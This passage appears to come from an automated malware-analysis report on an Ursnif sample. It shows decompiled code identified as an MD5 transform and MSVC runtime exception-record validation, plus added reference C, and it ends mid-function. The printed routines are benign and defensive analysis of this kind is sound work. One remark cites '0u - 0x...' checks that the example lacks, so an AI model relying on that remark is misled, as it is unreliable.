                                      				_t352 = ( !_t231 & _t409 | _t689 & _t231) + _v56 + _t350 + 0x4787c62a + _t231;
                                      				asm("ror edx, 0xf");
                                      				_t411 = ( !_t352 & _t689 | _t352 & _t231) + _v52 + _t409 - 0x57cfb9ed + _t352;
                                      				asm("ror esi, 0xa");
                                      				_t691 = ( !_t411 & _t231 | _t352 & _t411) + _v48 + _t689 - 0x2b96aff + _t411;
                                      				_v8 = _t691;
                                      				_t696 = _v8;
                                      				asm("rol eax, 0x7");
                                      				_t233 = ( !_t691 & _t352 | _t411 & _v8) + _v44 + _t231 + 0x698098d8 + _t696;
                                      				asm("rol ecx, 0xc");
                                      				_t354 = ( !_t233 & _t411 | _t696 & _t233) + _v40 + _t352 - 0x74bb0851 + _t233;
                                      				asm("ror edx, 0xf");
                                      				_t413 = ( !_t354 & _t696 | _t354 & _t233) + _v36 + _t411 - 0xa44f + _t354;
                                      				asm("ror esi, 0xa");
                                      				_t698 = ( !_t413 & _t233 | _t354 & _t413) + _v32 + _t696 - 0x76a32842 + _t413;
                                      				_v8 = _t698;
                                      				asm("rol eax, 0x7");
                                      				_t235 = ( !_t698 & _t354 | _t413 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
                                      				asm("rol ecx, 0xc");
                                      				_t356 = ( !_t235 & _t413 | _v8 & _t235) + _v24 + _t354 - 0x2678e6d + _t235;
                                      				_t507 =  !_t356;
                                      				asm("ror edx, 0xf");
                                      				_t415 = (_t507 & _v8 | _t356 & _t235) + _v20 + _t413 - 0x5986bc72 + _t356;
                                      				_v12 = _t415;
                                      				_v12 =  !_v12;
                                      				asm("ror esi, 0xa");
                                      				_t717 = (_v12 & _t235 | _t356 & _t415) + _v16 + _v8 + 0x49b40821 + _t415;
                                      				asm("rol eax, 0x5");
                                      				_t237 = (_t507 & _t415 | _t356 & _t717) + _v72 + _t235 - 0x9e1da9e + _t717;
                                      				asm("rol ecx, 0x9");
                                      				_t358 = (_v12 & _t717 | _t415 & _t237) + _v52 + _t356 - 0x3fbf4cc0 + _t237;
                                      				asm("rol edx, 0xe");
                                      				_t417 = ( !_t717 & _t237 | _t358 & _t717) + _v32 + _t415 + 0x265e5a51 + _t358;
                                      				asm("ror esi, 0xc");
                                      				_t719 = ( !_t237 & _t358 | _t417 & _t237) + _v76 + _t717 - 0x16493856 + _t417;
                                      				asm("rol eax, 0x5");
                                      				_t239 = ( !_t358 & _t417 | _t358 & _t719) + _v56 + _t237 - 0x29d0efa3 + _t719;
                                      				asm("rol ecx, 0x9");
                                      				_t360 = ( !_t417 & _t719 | _t417 & _t239) + _v36 + _t358 + 0x2441453 + _t239;
                                      				asm("rol edx, 0xe");
                                      				_t419 = ( !_t719 & _t239 | _t360 & _t719) + _v16 + _t417 - 0x275e197f + _t360;
                                      				asm("ror esi, 0xc");
                                      				_t721 = ( !_t239 & _t360 | _t419 & _t239) + _v60 + _t719 - 0x182c0438 + _t419;
                                      				asm("rol eax, 0x5");
                                      				_t241 = ( !_t360 & _t419 | _t360 & _t721) + _v40 + _t239 + 0x21e1cde6 + _t721;
                                      				asm("rol ecx, 0x9");
                                      				_t362 = ( !_t419 & _t721 | _t419 & _t241) + _v20 + _t360 - 0x3cc8f82a + _t241;
                                      				asm("rol edx, 0xe");
                                      				_t421 = ( !_t721 & _t241 | _t362 & _t721) + _v64 + _t419 - 0xb2af279 + _t362;
                                      				asm("ror esi, 0xc");
                                      				_t723 = ( !_t241 & _t362 | _t421 & _t241) + _v44 + _t721 + 0x455a14ed + _t421;
                                      				asm("rol eax, 0x5");
                                      				_t243 = ( !_t362 & _t421 | _t362 & _t723) + _v24 + _t241 - 0x561c16fb + _t723;
                                      				asm("rol ecx, 0x9");
                                      				_t364 = ( !_t421 & _t723 | _t421 & _t243) + _v68 + _t362 - 0x3105c08 + _t243;
                                      				asm("rol edx, 0xe");
                                      				_t423 = ( !_t723 & _t243 | _t364 & _t723) + _v48 + _t421 + 0x676f02d9 + _t364;
                                      				asm("ror esi, 0xc");
                                      				_t725 = ( !_t243 & _t364 | _t423 & _t243) + _v28 + _t723 - 0x72d5b376 + _t423;
                                      				asm("rol eax, 0x4");
                                      				_t245 = (_t364 ^ _t423 ^ _t725) + _v56 + _t243 - 0x5c6be + _t725;
                                      				asm("rol ecx, 0xb");
                                      				_t366 = (_t423 ^ _t725 ^ _t245) + _v44 + _t364 - 0x788e097f + _t245;
                                      				asm("rol edx, 0x10");
                                      				_t425 = (_t366 ^ _t725 ^ _t245) + _v32 + _t423 + 0x6d9d6122 + _t366;
                                      				_t598 = _t366 ^ _t425;
                                      				asm("ror esi, 0x9");
                                      				_t727 = (_t598 ^ _t245) + _v20 + _t725 - 0x21ac7f4 + _t425;
                                      				asm("rol eax, 0x4");
                                      				_t247 = (_t598 ^ _t727) + _v72 + _t245 - 0x5b4115bc + _t727;
                                      				asm("rol edi, 0xb");
                                      				_t606 = (_t425 ^ _t727 ^ _t247) + _v60 + _t366 + 0x4bdecfa9 + _t247;
                                      				asm("rol edx, 0x10");
                                      				_t427 = (_t606 ^ _t727 ^ _t247) + _v48 + _t425 - 0x944b4a0 + _t606;
                                      				_t337 = _t606 ^ _t427;
                                      				asm("ror ecx, 0x9");
                                      				_t375 = (_t337 ^ _t247) + _v36 + _t727 - 0x41404390 + _t427;
                                      				asm("rol eax, 0x4");
                                      				_t249 = (_t337 ^ _t375) + _v24 + _t247 + 0x289b7ec6 + _t375;
                                      				asm("rol esi, 0xb");
                                      				_t733 = (_t427 ^ _t375 ^ _t249) + _v76 + _t606 - 0x155ed806 + _t249;
                                      				asm("rol edi, 0x10");
                                      				_t612 = (_t733 ^ _t375 ^ _t249) + _v64 + _t427 - 0x2b10cf7b + _t733;
                                      				_t429 = _t733 ^ _t612;
                                      				asm("ror ecx, 0x9");
                                      				_t377 = (_t429 ^ _t249) + _v52 + _t375 + 0x4881d05 + _t612;
                                      				asm("rol eax, 0x4");
                                      				_t251 = (_t429 ^ _t377) + _v40 + _t249 - 0x262b2fc7 + _t377;
                                      				asm("rol edx, 0xb");
                                      				_t437 = (_t612 ^ _t377 ^ _t251) + _v28 + _t733 - 0x1924661b + _t251;
                                      				asm("rol esi, 0x10");
                                      				_t739 = (_t437 ^ _t377 ^ _t251) + _v16 + _t612 + 0x1fa27cf8 + _t437;
                                      				asm("ror ecx, 0x9");
                                      				_t379 = (_t437 ^ _t739 ^ _t251) + _v68 + _t377 - 0x3b53a99b + _t739;
                                      				asm("rol eax, 0x6");
                                      				_t253 = (( !_t437 | _t379) ^ _t739) + _v76 + _t251 - 0xbd6ddbc + _t379;
                                      				asm("rol edx, 0xa");
                                      				_t439 = (( !_t739 | _t253) ^ _t379) + _v48 + _t437 + 0x432aff97 + _t253;
                                      				asm("rol esi, 0xf");
                                      				_t741 = (( !_t379 | _t439) ^ _t253) + _v20 + _t739 - 0x546bdc59 + _t439;
                                      				asm("ror ecx, 0xb");
                                      				_t381 = (( !_t253 | _t741) ^ _t439) + _v56 + _t379 - 0x36c5fc7 + _t741;
                                      				asm("rol eax, 0x6");
                                      				_t255 = (( !_t439 | _t381) ^ _t741) + _v28 + _t253 + 0x655b59c3 + _t381;
                                      				asm("rol edx, 0xa");
                                      				_t441 = (( !_t741 | _t255) ^ _t381) + _v64 + _t439 - 0x70f3336e + _t255;
                                      				asm("rol esi, 0xf");
                                      				_t743 = (( !_t381 | _t441) ^ _t255) + _v36 + _t741 - 0x100b83 + _t441;
                                      				asm("ror ecx, 0xb");
                                      				_t383 = (( !_t255 | _t743) ^ _t441) + _v72 + _t381 - 0x7a7ba22f + _t743;
                                      				asm("rol eax, 0x6");
                                      				_t257 = (( !_t441 | _t383) ^ _t743) + _v44 + _t255 + 0x6fa87e4f + _t383;
                                      				asm("rol edx, 0xa");
                                      				_t443 = (( !_t743 | _t257) ^ _t383) + _v16 + _t441 - 0x1d31920 + _t257;
                                      				asm("rol esi, 0xf");
                                      				_t745 = (( !_t383 | _t443) ^ _t257) + _v52 + _t743 - 0x5cfebcec + _t443;
                                      				asm("ror edi, 0xb");
                                      				_t678 = (( !_t257 | _t745) ^ _t443) + _v24 + _t383 + 0x4e0811a1 + _t745;
                                      				asm("rol eax, 0x6");
                                      				_t259 = (( !_t443 | _t678) ^ _t745) + _v60 + _t257 - 0x8ac817e + _t678;
                                      				asm("rol edx, 0xa");
                                      				_t445 = (( !_t745 | _t259) ^ _t678) + _v32 + _t443 - 0x42c50dcb + _t259;
                                      				_t399 = _a4;
                                      				asm("rol esi, 0xf");
                                      				_t747 = (( !_t678 | _t445) ^ _t259) + _v68 + _t745 + 0x2ad7d2bb + _t445;
                                       				 *_t399 =  *_t399 + _t259;                                                       // fold the four working values back into the 4-dword hash state that _a4 points to
                                       				asm("ror eax, 0xb");
                                       				 *((intOrPtr*)(_t399 + 4)) = (( !_t259 | _t747) ^ _t445) + _v40 + _t678 - 0x14792c6f +  *((intOrPtr*)(_t399 + 4)) + _t747;
                                       				 *((intOrPtr*)(_t399 + 8)) =  *((intOrPtr*)(_t399 + 8)) + _t747;
                                       				 *((intOrPtr*)(_t399 + 0xc)) =  *((intOrPtr*)(_t399 + 0xc)) + _t445;
                                       				return memset( &_v76, 0, 0x40);                                                 // wipe the local copy of the 64-byte message block (_v76 .. _v16, 16 dwords)
                                      			}
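The fragment above is the tail of an MD5 block transform. The immediates in the statements are T[48]..T[64] of RFC 1321: the positive ones (0x432aff97, 0x655b59c3, 0x6fa87e4f, 0x4e0811a1, 0x2ad7d2bb) appear as written, and the decompiler prints those with the top bit set as subtractions (- 0x546bdc59 is + 0xab9423a7, - 0x14792c6f is + 0xeb86d391, - 0x3b53a99b on the first line is + 0xc4ac5665, the last round-3 constant). The rotations 6/10/15/21 (ror 0xb being rol 21) are the round-4 shifts and `( !z | x) ^ y` is the round-4 function I(). The closing statements add the working values into the state at _a4 and the memset scrubs the local copy of the message block. The block below is an added example written for this page, not code from the sample or the report: a reference MD5 in C with the constant table exposed as `MD5_K` so the immediates in a decompilation can be checked against it, and the transform written in the same a/b/c/d shape as the listing.

```c
/* Added example for this page, not code from the sample or the report:
 * a reference MD5 block transform in C, laid out so its round-4 step can be
 * compared with the decompiled statements above. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Round constants T[1..64] from RFC 1321 (MD5_K[i] holds T[i+1]). The
 * decompiler prints those with the top bit set as negative immediates, so
 * "- 0x546bdc59" in the listing is "+ 0xab9423a7", i.e. MD5_K[50]. */
const uint32_t MD5_K[64] = {
    0xd76aa478, 0xe8c7b756, 0x242070db, 0xc1bdceee, 0xf57c0faf, 0x4787c62a, 0xa8304613, 0xfd469501,
    0x698098d8, 0x8b44f7af, 0xffff5bb1, 0x895cd7be, 0x6b901122, 0xfd987193, 0xa679438e, 0x49b40821,
    0xf61e2562, 0xc040b340, 0x265e5a51, 0xe9b6c7aa, 0xd62f105d, 0x02441453, 0xd8a1e681, 0xe7d3fbc8,
    0x21e1cde6, 0xc33707d6, 0xf4d50d87, 0x455a14ed, 0xa9e3e905, 0xfcefa3f8, 0x676f02d9, 0x8d2a4c8a,
    0xfffa3942, 0x8771f681, 0x6d9d6122, 0xfde5380c, 0xa4beea44, 0x4bdecfa9, 0xf6bb4b60, 0xbebfbc70,
    0x289b7ec6, 0xeaa127fa, 0xd4ef3085, 0x04881d05, 0xd9d4d039, 0xe6db99e5, 0x1fa27cf8, 0xc4ac5665,
    0xf4292244, 0x432aff97, 0xab9423a7, 0xfc93a039, 0x655b59c3, 0x8f0ccc92, 0xffeff47d, 0x85845dd1,
    0x6fa87e4f, 0xfe2ce6e0, 0xa3014314, 0x4e0811a1, 0xf7537e82, 0xbd3af235, 0x2ad7d2bb, 0xeb86d391 };

/* Per-step rotation amounts; round 4 uses 6/10/15/21, the rol counts in the listing. */
static const uint8_t MD5_S[64] = {
     7, 12, 17, 22,  7, 12, 17, 22,  7, 12, 17, 22,  7, 12, 17, 22,
     5,  9, 14, 20,  5,  9, 14, 20,  5,  9, 14, 20,  5,  9, 14, 20,
     4, 11, 16, 23,  4, 11, 16, 23,  4, 11, 16, 23,  4, 11, 16, 23,
     6, 10, 15, 21,  6, 10, 15, 21,  6, 10, 15, 21,  6, 10, 15, 21 };

static uint32_t rol32(uint32_t x, unsigned n) { return (x << n) | (x >> (32 - n)); }

/* Process one 64-byte block; state[4] is the a,b,c,d that the decompiled
 * function updates through its _a4 pointer at the end. */
void md5_transform(uint32_t state[4], const uint8_t block[64])
{
    uint32_t M[16], a = state[0], b = state[1], c = state[2], d = state[3];
    for (int i = 0; i < 16; i++)                       /* little-endian message words */
        M[i] = (uint32_t)block[4 * i] | (uint32_t)block[4 * i + 1] << 8 |
               (uint32_t)block[4 * i + 2] << 16 | (uint32_t)block[4 * i + 3] << 24;
    for (int i = 0; i < 64; i++) {
        uint32_t f, g;
        if (i < 16)      { f = (b & c) | (~b & d); g = i; }
        else if (i < 32) { f = (d & b) | (~d & c); g = (5 * i + 1) & 15; }
        else if (i < 48) { f = b ^ c ^ d;          g = (3 * i + 5) & 15; }
        else             { f = c ^ (b | ~d);       g = (7 * i) & 15; }   /* I(): the "( !z | x) ^ y" shape above */
        uint32_t tmp = d;
        d = c;
        c = b;
        b = b + rol32(a + f + MD5_K[i] + M[g], MD5_S[i]);
        a = tmp;
    }
    state[0] += a; state[1] += b; state[2] += c; state[3] += d;
    memset(M, 0, sizeof M);   /* same scrub as the sample's memset(&_v76, 0, 0x40) */
}

/* MD5 of an arbitrary buffer; writes 32 lowercase hex digits plus NUL into out. */
void md5_hex(const uint8_t *msg, size_t len, char out[33])
{
    uint32_t st[4] = { 0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476 };
    uint8_t blk[64];
    size_t i = 0;
    for (; i + 64 <= len; i += 64) md5_transform(st, msg + i);
    size_t rem = len - i;
    memset(blk, 0, sizeof blk);
    memcpy(blk, msg + i, rem);
    blk[rem] = 0x80;                                   /* padding bit */
    if (rem >= 56) { md5_transform(st, blk); memset(blk, 0, sizeof blk); }
    uint64_t bits = (uint64_t)len * 8;
    for (int k = 0; k < 8; k++) blk[56 + k] = (uint8_t)(bits >> (8 * k));
    md5_transform(st, blk);
    for (int k = 0; k < 4; k++)
        for (int j = 0; j < 4; j++)
            sprintf(out + 8 * k + 2 * j, "%02x", (st[k] >> (8 * j)) & 0xff);
}

/* 1 if MD5(msg) equals the expected hex digest, else 0. */
int md5_matches(const char *msg, const char *expect_hex)
{
    char hex[33];
    md5_hex((const uint8_t *)msg, strlen(msg), hex);
    return strcmp(hex, expect_hex) == 0;
}

int main(void)
{
    const char *inputs[] = { "", "abc", "The quick brown fox jumps over the lazy dog" };
    char hex[33];
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++) {
        md5_hex((const uint8_t *)inputs[i], strlen(inputs[i]), hex);
        printf("md5(\"%s\") = %s\n", inputs[i], hex);
    }
    return 0;
}
```

When hunting for the same routine in a disassembler, searching for T[1] (0xd76aa478) or T[64] (0xeb86d391) is the usual shortcut; in a decompilation like the one above the search also has to cover the two's-complement forms, which is what the `0u - 0x...` checks in this example express.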
                                       Instruction addresses for the statements above: 0x00fa40b6 through 0x00fa4756 (the per-statement address column does not survive extraction and is not reproduced here).

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                       • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: memset
                                      • String ID:
                                      • API String ID: 2221118986-0
                                      • Opcode ID: 9a35ab16c410ebec120d6e973322aca9da4e54b7e5eae7d9a565d0bb68c1b7f3
                                      • Instruction ID: 8f6349d4561ef1cbf69fcd8a91682ee454d988ef387e1592c6d1a119806a3d1c
                                      • Opcode Fuzzy Hash: 9a35ab16c410ebec120d6e973322aca9da4e54b7e5eae7d9a565d0bb68c1b7f3
                                      • Instruction Fuzzy Hash: DD22847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00FAB169(long _a4) {
                                      				intOrPtr _v8;
                                      				intOrPtr _v12;
                                      				signed int _v16;
                                      				short* _v32;
                                      				void _v36;
                                      				void* _t57;
                                      				signed int _t58;
                                      				signed int _t61;
                                      				signed int _t62;
                                      				void* _t63;
                                      				signed int* _t68;
                                      				intOrPtr* _t69;
                                      				intOrPtr* _t71;
                                      				intOrPtr _t72;
                                      				intOrPtr _t75;
                                      				void* _t76;
                                      				signed int _t77;
                                      				void* _t78;
                                      				void _t80;
                                      				signed int _t81;
                                      				signed int _t84;
                                      				signed int _t86;
                                      				short* _t87;
                                      				void* _t89;
                                      				signed int* _t90;
                                      				long _t91;
                                      				signed int _t93;
                                      				signed int _t94;
                                      				signed int _t100;
                                      				signed int _t102;
                                      				void* _t104;
                                      				long _t108;
                                      				signed int _t110;
                                      
                                       				_t108 = _a4;
                                       				_t76 =  *(_t108 + 8);                                 // pointer field at +8 of the record passed in (the scope table, if this is an _except_handler3 registration record)
                                       				if((_t76 & 0x00000003) != 0) {                       // reject anything that is not 4-byte aligned
                                       					L3:
                                       					return 0;
                                       				}
                                       				_a4 =  *[fs:0x4];                                     // TIB StackBase
                                       				_v8 =  *[fs:0x8];                                     // TIB StackLimit
                                       				if(_t76 < _v8 || _t76 >= _a4) {                       // continue only when the pointer is NOT inside the current stack; otherwise return 0 (L3)
                                       					_t102 =  *(_t108 + 0xc);                          // field at +0xc (try level, i.e. the highest scope entry to check); -1 means nothing to walk
                                      					__eflags = _t102 - 0xffffffff;
                                      					if(_t102 != 0xffffffff) {
                                      						_t91 = 0;
                                      						__eflags = 0;
                                      						_a4 = 0;
                                      						_t57 = _t76;
                                      						do {
                                       							_t80 =  *_t57;                                    // first dword of the entry (enclosing level in an EH3 scope table)
                                       							__eflags = _t80 - 0xffffffff;
                                       							if(_t80 == 0xffffffff) {                          // -1 (outermost) is always acceptable
                                       								goto L9;
                                       							}
                                       							__eflags = _t80 - _t91;
                                       							if(_t80 >= _t91) {                                // otherwise it must refer to an earlier entry; a forward or self reference rejects the record
                                      								L20:
                                      								_t63 = 0;
                                      								L60:
                                      								return _t63;
                                      							}
                                      							L9:
                                       							__eflags =  *(_t57 + 4);                          // second dword of the entry (filter pointer)
                                       							if( *(_t57 + 4) != 0) {                           // count entries that carry a filter; a non-zero count enables the saved-ESP check after the loop
                                      								_t12 =  &_a4;
                                      								 *_t12 = _a4 + 1;
                                      								__eflags =  *_t12;
                                      							}
                                      							_t91 = _t91 + 1;
                                       							_t57 = _t57 + 0xc;                                // next 12-byte entry
                                      							__eflags = _t91 - _t102;
                                      						} while (_t91 <= _t102);
                                      						__eflags = _a4;
                                      						if(_a4 == 0) {
                                      							L15:
                                       							_t81 =  *0xfad288; // 0x0                         // number of valid entries in the page cache at 0xfad290 (capped at 16, see L28 and L56)
                                       							_t110 = _t76 & 0xfffff000;                        // page base of the pointer: the cache key
                                      							_t58 = 0;
                                      							__eflags = _t81;
                                      							if(_t81 <= 0) {
                                      								L18:
                                       								_t104 = _t102 | 0xffffffff;                   // -1: NtCurrentProcess(), reused as the "undecidable" return value at L59
                                       								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4); // MemoryBasicInformation into _v36; 0x1c == sizeof(MEMORY_BASIC_INFORMATION) on x86, so _v32 = AllocationBase, _v16 = Protect, _v12 = Type
                                      								__eflags = _t61;
                                      								if(_t61 < 0) {
                                      									_t62 = 0;
                                      									__eflags = 0;
                                      								} else {
                                      									_t62 = _a4;
                                      								}
                                      								__eflags = _t62;
                                      								if(_t62 == 0) {
                                      									L59:
                                      									_t63 = _t104;
                                      									goto L60;
                                      								} else {
                                       									__eflags = _v12 - 0x1000000;                  // MEMORY_BASIC_INFORMATION.Type
                                       									if(_v12 != 0x1000000) {                       // must be MEM_IMAGE: a pointer into a non-image mapping cannot be validated (return -1)
                                       										goto L59;
                                       									}
                                       									__eflags = _v16 & 0x000000cc;                 // .Protect & (PAGE_READWRITE | PAGE_WRITECOPY | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY)
                                       									if((_v16 & 0x000000cc) == 0) {                // page is not writable: accept without parsing the PE headers
                                      										L46:
                                       										_t63 = 1;
                                       										 *0xfad2d0 = 1;                               // as written this store-then-test is always true; it is the decompiler's rendering of an xchg on the cache lock dword at 0xfad2d0, where the OLD value is what gets tested
                                       										__eflags =  *0xfad2d0;
                                       										if( *0xfad2d0 != 0) {                         // lock already held: return 1 without updating the cache
                                      											goto L60;
                                      										}
                                      										_t84 =  *0xfad288; // 0x0
                                      										__eflags = _t84;
                                      										_t93 = _t84;
                                      										if(_t84 <= 0) {
                                      											L51:
                                      											__eflags = _t93;
                                      											if(_t93 != 0) {
                                      												L58:
                                      												 *0xfad2d0 = 0;
                                      												goto L5;
                                      											}
                                      											_t77 = 0xf;
                                      											__eflags = _t84 - _t77;
                                      											if(_t84 <= _t77) {
                                      												_t77 = _t84;
                                      											}
                                      											_t94 = 0;
                                      											__eflags = _t77;
                                      											if(_t77 < 0) {
                                      												L56:
                                      												__eflags = _t84 - 0x10;
                                      												if(_t84 < 0x10) {
                                      													_t86 = _t84 + 1;
                                      													__eflags = _t86;
                                      													 *0xfad288 = _t86;
                                      												}
                                      												goto L58;
                                      											} else {
                                      												do {
                                      													_t68 = 0xfad290 + _t94 * 4;
                                      													_t94 = _t94 + 1;
                                      													__eflags = _t94 - _t77;
                                      													 *_t68 = _t110;
                                      													_t110 =  *_t68;
                                      												} while (_t94 <= _t77);
                                      												goto L56;
                                      											}
                                      										}
                                      										_t69 = 0xfad28c + _t84 * 4;
                                      										while(1) {
                                      											__eflags =  *_t69 - _t110;
                                      											if( *_t69 == _t110) {
                                      												goto L51;
                                      											}
                                      											_t93 = _t93 - 1;
                                      											_t69 = _t69 - 4;
                                      											__eflags = _t93;
                                      											if(_t93 > 0) {
                                      												continue;
                                      											}
                                      											goto L51;
                                      										}
                                      										goto L51;
                                      									}
                                       									_t87 = _v32;                                  // .AllocationBase: start of the mapped image
                                       									__eflags =  *_t87 - 0x5a4d;                   // 'MZ'
                                       									if( *_t87 != 0x5a4d) {
                                       										goto L59;
                                       									}
                                       									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;   // e_lfanew -> IMAGE_NT_HEADERS
                                       									__eflags =  *_t71 - 0x4550;                   // 'PE\0\0'
                                       									if( *_t71 != 0x4550) {
                                       										goto L59;
                                       									}
                                       									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b; // OptionalHeader.Magic: PE32 only
                                       									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                      										goto L59;
                                      									}
                                       									_t78 = _t76 - _t87;                           // RVA of the pointer being validated
                                       									__eflags =  *((short*)(_t71 + 6));            // FileHeader.NumberOfSections, tested as a signed short
                                       									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18; // first IMAGE_SECTION_HEADER = NT headers + 0x18 + SizeOfOptionalHeader
                                       									if( *((short*)(_t71 + 6)) <= 0) {
                                      										goto L59;
                                      									}
                                       									_t72 =  *((intOrPtr*)(_t89 + 0xc));           // first section's VirtualAddress (only the first section header is examined in this output)
                                       									__eflags = _t78 - _t72;
                                       									if(_t78 < _t72) {                             // RVA before the section: accept
                                       										goto L46;
                                       									}
                                       									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72; // VirtualAddress + Misc.VirtualSize
                                       									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {     // RVA past the section: accept
                                       										goto L46;
                                       									}
                                       									__eflags =  *(_t89 + 0x27) & 0x00000080;      // top byte of Characteristics: 0x80 here is IMAGE_SCN_MEM_WRITE (0x80000000)
                                       									if(( *(_t89 + 0x27) & 0x00000080) != 0) {     // pointer lies inside a writable section: reject (return 0 at L20)
                                       										goto L20;
                                       									}
                                       									goto L46;
                                      								}
                                      							} else {
                                      								goto L16;
                                      							}
                                      							while(1) {
                                      								L16:
                                      								__eflags =  *((intOrPtr*)(0xfad290 + _t58 * 4)) - _t110;
                                      								if( *((intOrPtr*)(0xfad290 + _t58 * 4)) == _t110) {
                                      									break;
                                      								}
                                      								_t58 = _t58 + 1;
                                      								__eflags = _t58 - _t81;
                                      								if(_t58 < _t81) {
                                      									continue;
                                      								}
                                      								goto L18;
                                      							}
                                      							__eflags = _t58;
                                      							if(_t58 <= 0) {
                                      								goto L5;
                                      							}
                                      							 *0xfad2d0 = 1;
                                      							__eflags =  *0xfad2d0;
                                      							if( *0xfad2d0 != 0) {
                                      								goto L5;
                                      							}
                                      							__eflags =  *((intOrPtr*)(0xfad290 + _t58 * 4)) - _t110;
                                      							if( *((intOrPtr*)(0xfad290 + _t58 * 4)) == _t110) {
                                      								L32:
                                      								_t100 = 0;
                                      								__eflags = _t58;
                                      								if(_t58 < 0) {
                                      									L34:
                                      									 *0xfad2d0 = 0;
                                      									goto L5;
                                      								} else {
                                      									goto L33;
                                      								}
                                      								do {
                                      									L33:
                                      									_t90 = 0xfad290 + _t100 * 4;
                                      									_t100 = _t100 + 1;
                                      									__eflags = _t100 - _t58;
                                      									 *_t90 = _t110;
                                      									_t110 =  *_t90;
                                      								} while (_t100 <= _t58);
                                      								goto L34;
                                      							}
                                      							_t25 = _t81 - 1; // -1
                                      							_t58 = _t25;
                                      							__eflags = _t58;
                                      							if(_t58 < 0) {
                                      								L28:
                                      								__eflags = _t81 - 0x10;
                                      								if(_t81 < 0x10) {
                                      									_t81 = _t81 + 1;
                                      									__eflags = _t81;
                                      									 *0xfad288 = _t81;
                                      								}
                                      								_t28 = _t81 - 1; // 0x0
                                      								_t58 = _t28;
                                      								goto L32;
                                      							} else {
                                      								goto L25;
                                      							}
                                      							while(1) {
                                      								L25:
                                      								__eflags =  *((intOrPtr*)(0xfad290 + _t58 * 4)) - _t110;
                                      								if( *((intOrPtr*)(0xfad290 + _t58 * 4)) == _t110) {
                                      									break;
                                      								}
                                      								_t58 = _t58 - 1;
                                      								__eflags = _t58;
                                      								if(_t58 >= 0) {
                                      									continue;
                                      								}
                                      								break;
                                      							}
                                      							__eflags = _t58;
                                      							if(__eflags >= 0) {
                                      								if(__eflags == 0) {
                                      									goto L34;
                                      								}
                                      								goto L32;
                                      							}
                                      							goto L28;
                                      						}
                                       						_t75 =  *((intOrPtr*)(_t108 - 8));                // dword 8 bytes below the record (the saved ESP in an _except_handler3 frame)
                                       						__eflags = _t75 - _v8;
                                       						if(_t75 < _v8) {                                  // it must lie on the stack, between StackLimit and the record itself
                                      							goto L20;
                                      						}
                                      						__eflags = _t75 - _t108;
                                      						if(_t75 >= _t108) {
                                      							goto L20;
                                      						}
                                      						goto L15;
                                      					}
                                      					L5:
                                      					_t63 = 1;
                                      					goto L60;
                                      				} else {
                                      					goto L3;
                                      				}
                                      			}
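Taken together, E00FAB169 rejects the record if the pointer at +8 is unaligned or lies on the current stack, walks the 12-byte entries it points to, asks NtQueryVirtualMemory whether the pointer's page is MEM_IMAGE, accepts non-writable pages outright, and for writable pages parses the PE32 headers to refuse a pointer that falls inside a section flagged IMAGE_SCN_MEM_WRITE; pages that pass are remembered in a 16-entry cache at 0xfad290 behind the lock dword at 0xfad2d0. That is the shape of the `_except_handler3` registration-record validation (`_ValidateEH3RN`) that the MSVC CRT links statically into binaries. The report does not say so, but on that reading the function is runtime boilerplate rather than Ursnif-specific logic, and the practical point for an analyst is not to mistake its NtQueryVirtualMemory and PE-header walk for an injection or anti-analysis routine. The block below is an added example written for this page, not code from the sample or the report: it re-implements the image/section part of the decision portably, with the Type and Protect fields that the sample reads from MEMORY_BASIC_INFORMATION passed in as parameters and a constructed in-memory PE32 header (hypothetical `.text` and `.data` sections) standing in for AllocationBase. Unlike the listing, which inspects only the first section header, it walks all of them, which is the general form of the check.

```c
/* Added example for this page, not code from the sample or the report:
 * a portable re-implementation of the "pointer must not lie in writable
 * image memory" test performed by E00FAB169, run against a constructed
 * (fake) PE32 header so it works off Windows. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MEM_IMAGE            0x1000000u   /* MEMORY_BASIC_INFORMATION.Type compared by the sample */
#define WRITABLE_PROTECT     0xccu        /* PAGE_READWRITE|PAGE_WRITECOPY|PAGE_EXECUTE_READWRITE|PAGE_EXECUTE_WRITECOPY */
#define IMAGE_SCN_MEM_WRITE  0x80000000u  /* the 0x80 bit of the byte at section header +0x27 */
#define SECTION_HEADER_SIZE  0x28

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static void wr32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Same return convention as the sample: 1 = accepted, 0 = rejected (writable),
 * -1 = cannot decide (not an image mapping, or headers do not parse).
 * image_base stands in for .AllocationBase (_v32), mbi_type for .Type (_v12)
 * and mbi_protect for .Protect (_v16). */
int validate_ptr_in_image(const uint8_t *image_base, uint32_t ptr_rva,
                          uint32_t mbi_type, uint32_t mbi_protect)
{
    if (mbi_type != MEM_IMAGE) return -1;
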